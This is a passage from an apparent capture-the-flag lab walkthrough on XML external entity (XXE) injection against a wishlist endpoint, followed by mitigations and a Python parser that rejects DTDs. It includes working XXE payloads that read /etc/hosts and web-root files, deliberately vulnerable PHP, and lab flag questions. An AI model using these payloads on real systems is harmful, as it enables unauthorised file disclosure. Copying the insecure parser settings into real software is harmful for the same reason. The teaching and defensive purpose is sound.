Once you browse to the URL, all the requests are intercepted and can be seen under the Proxy -> HTTP history tab.

What is Happening in the Backend?

Now, when you visit the URL http://MACHINE_IP/product.php and click Add to Wishlist, an AJAX call is made to wishlist.php with the following XML as input:

<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>1</product_id>
  </item>
</wishlist>

In the above XML, the <product_id> tag contains the ID of the product, which is 1 in this case. Now, let's review the Add to Wishlist request logged in Burp Suite's HTTP history option under the Proxy tab.
As discussed above, the request contains XML being forwarded as a POST request, as shown below:

This wishlist.php accepts the request and parses it using the following code:

<?php
..
...
// Vulnerable by design: external entities may be loaded from disk or the network
libxml_disable_entity_loader(false);
// LIBXML_NOENT substitutes entities, so &payload; is replaced with the referenced content
$wishlist = simplexml_load_string($xml_data, "SimpleXMLElement", LIBXML_NOENT);
...
..
echo "Item added to your wishlist successfully.";
?>

Preparing the Payload

When a user sends specially crafted XML data to the application, the line libxml_disable_entity_loader(false) allows the XML parser to load external entities. This means the XML input can include external file references or requests to remote servers. When the XML is processed by simplexml_load_string with the LIBXML_NOENT option, the web app resolves external entities, allowing attackers access to sensitive files or allowing them to make unintended requests from the server. What if we update the XML request to include references to external entities? We will use the following XML instead of the above XML:

<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>&payload;</product_id>
  </item>
</wishlist>

When we send this updated XML payload, the first two lines introduce an external entity called payload. The line <!ENTITY payload SYSTEM "/etc/hosts"> tells the XML parser to replace the &payload; reference with the contents of the file /etc/hosts on the server. When the XML is processed, instead of a normal product_id, the application will try to load and include the contents of the file specified in the entity (/etc/hosts).

Exploitation

Now, let's perform the exploitation by repeating the request we captured earlier. The Burp Suite tool has a feature known as Repeater that allows you to send multiple HTTP requests. We will use this feature to duplicate our HTTP POST request and send it multiple times to exploit the vulnerability.
Right-click on the wishlist.php POST request and click on Send to Repeater. Now, switch to the Repeater tab, where you'll find the POST request that needs to be modified. We will update the XML payload with the new data as shown below and then send the modified request:

Place the mouse cursor inside the request in the Repeater tab in Burp Suite and press Ctrl+V, or paste the payload into the highlighted area above. When we clicked Send, the server processed the malicious XML payload, which included the external entity reference to /etc/hosts. As a result, wishlist.php responded with the contents of the /etc/hosts file, confirming the XXE vulnerability.

Time for Some Action

Now that you've identified a vulnerability in the application, it's time to see it in action! McSkidy Software has tasked us with finding loopholes, and we've successfully uncovered one in the wishlist.php endpoint. But our work doesn't end there—let's take it a step further and assess the potential impact this vulnerability could have on the application. Earlier, we discovered a page accessible only by administrators, which seems like an exciting target. What if we could use the vulnerability we've found to access sensitive information, like the wishes placed by the townspeople? Now that our objective is clear, let's leverage the vulnerability we discovered to read the contents of each wishes page and demonstrate the full extent of this flaw to help McSkidy secure the platform.

To get started, let's recall the page that is only accessible by admins: /wishes/wish_1.txt. Using this path, we just need to guess the potential absolute path of the file. Typically, web applications are hosted under /var/www/html. With that in mind, let's build our new payload to read the wishes while leveraging the vulnerability.

Note: Not all web applications use the path /var/www/html, but web servers typically use it.
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/var/www/html/wishes/wish_1.txt"> ]>
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>&payload;</product_id>
  </item>
</wishlist>

Surprisingly, we got lucky and our assumption worked. The next thing to do is see whether we can view more wishes using our discovery. To do this, let's try replacing wish_1.txt with wish_2.txt. As a result, we were able to view the next wish. You may observe that we just incremented the number by one. Given this, you may continue checking the other wishes and see all the wishes stored in the application. After iterating through the wishes, we have proved the potential impact of the vulnerability: anyone who leverages it could read the wishes submitted by the townspeople of Wareville.

Conclusion

It was confirmed that the application was vulnerable, and the developers were not at fault since they only wanted to give the townspeople something before Christmas. However, it became evident that bypassing security testing led to an application that did not securely handle incoming requests. As soon as the vulnerability was discovered, McSkidy promptly coordinated with the developers to implement the necessary mitigations. The following proactive approach helped to address the potential risks of XXE attacks:

* Disable External Entity Loading: The primary fix is to disable external entity loading in your XML parser. In PHP, for example, you can prevent XXE by setting libxml_disable_entity_loader(true) before processing the XML.
* Validate and Sanitise User Input: Always validate and sanitise the XML input received from users. This ensures that only expected data is processed, reducing the risk of malicious content being included in the request. For example, remove suspicious keywords like /etc/host, /etc/passwd, etc. from the request.
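As an added example (not the WishVille application's own PHP), here are those two mitigations applied with Python's standard library: refuse any document that carries a DTD before the parser ever sees it, then accept only integer IDs from the parsed wishlist. The parse_wishlist and classify functions and the sample request bodies are constructed for this illustration.

```python
"""Defensive handling of the wishlist XML discussed above.

Added example, not WishVille's PHP. Two layers: (1) refuse any document
that carries a DTD at all, since entity declarations (internal or external)
can only live in a DTD, and (2) validate the parsed values so only integer
IDs reach the application. Checking the raw bytes before parsing does not
depend on parser flags, which matters given that the PHP side combined
libxml_disable_entity_loader(false) with LIBXML_NOENT (and that
libxml_disable_entity_loader() itself is deprecated since PHP 8.0).
"""
import re
import xml.etree.ElementTree as ET

# A DTD may only appear in the prolog, but the search is deliberately
# unanchored so a DOCTYPE hidden after comments or whitespace, or an
# ENTITY declaration anywhere, still fails closed.
_DTD_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)", re.IGNORECASE)


class WishlistRejected(ValueError):
    """Raised when the XML is refused before or after parsing."""


def reject_dtd(xml_bytes: bytes) -> None:
    """Fail closed if the document declares a DTD or an entity anywhere."""
    if _DTD_MARKERS.search(xml_bytes):
        raise WishlistRejected("DTD / entity declarations are not accepted")


def _int_field(parent: ET.Element, tag: str) -> int:
    """Return the decimal integer in <tag>, or reject the document."""
    node = parent.find(tag)
    text = (node.text or "").strip() if node is not None else ""
    if not text.isdigit():
        raise WishlistRejected(f"<{tag}> must be a decimal integer")
    return int(text)


def parse_wishlist(xml_bytes: bytes) -> dict:
    """Return {"user_id": int, "product_ids": [int, ...]} or raise WishlistRejected."""
    reject_dtd(xml_bytes)
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        raise WishlistRejected(f"malformed XML: {exc}") from exc
    if root.tag != "wishlist":
        raise WishlistRejected("root element must be <wishlist>")
    items = root.findall("item")
    if not items:
        raise WishlistRejected("at least one <item> is required")
    return {
        "user_id": _int_field(root, "user_id"),
        "product_ids": [_int_field(item, "product_id") for item in items],
    }


def classify(xml_bytes: bytes) -> str:
    """'accepted' or the rejection reason; the string is what you would log."""
    try:
        parse_wishlist(xml_bytes)
        return "accepted"
    except WishlistRejected as exc:
        return f"rejected: {exc}"


# Constructed sample bodies: the normal Add to Wishlist request, the XXE
# payload from the walkthrough, and a DTD-free but non-numeric product_id.
BENIGN = b"""<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>1</product_id>
  </item>
</wishlist>"""

XXE_PAYLOAD = b"""<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>&payload;</product_id>
  </item>
</wishlist>"""

NON_NUMERIC = b"<wishlist><user_id>1</user_id><item><product_id>one</product_id></item></wishlist>"

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("xxe", XXE_PAYLOAD), ("non-numeric", NON_NUMERIC)):
        print(f"{name:12s} {classify(body)}")
```

Rejecting the DTD outright is stricter than a keyword blocklist such as /etc/passwd: it needs no knowledge of which files or URLs an entity might name.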
After discovering the vulnerability, McSkidy immediately remembered that a CHANGELOG file exists within the web application, stored at the following endpoint: http://MACHINE_IP/CHANGELOG. After checking, it can be seen that someone pushed the vulnerable code within the application after Software's team. With this discovery, McSkidy still couldn't confirm whether the Mayor intentionally made the application vulnerable. However, the Mayor had already become suspicious, and McSkidy began to formulate theories about his possible involvement.

Answer the questions below

* What is the flag discovered after navigating through the wishes?
* What is the flag seen on the possible proof of sabotage?
* If you want to learn more about the XXE injection attack, check out the XXE room!
* Following McSkidy's advice, Software recently hardened the server. It used to have many unneeded open ports, but not anymore. Not that this matters in any way.

Created by tryhackme, ar33zy, cmnatic, Dex01, timtaylor, munra, hk, strategos, Fontaene, SecurityNomad, am03bam4n, umairalizafar, hadrian3689, melmols, Maxablancas, 1337rce, MartaStrzelec, DrGonz0, h4sh3m00, l000g1c, rePl4stic, Aashir.Masood, str3g4tt4

Room Type: Free Room. Anyone can deploy virtual machines in the room (without being subscribed)!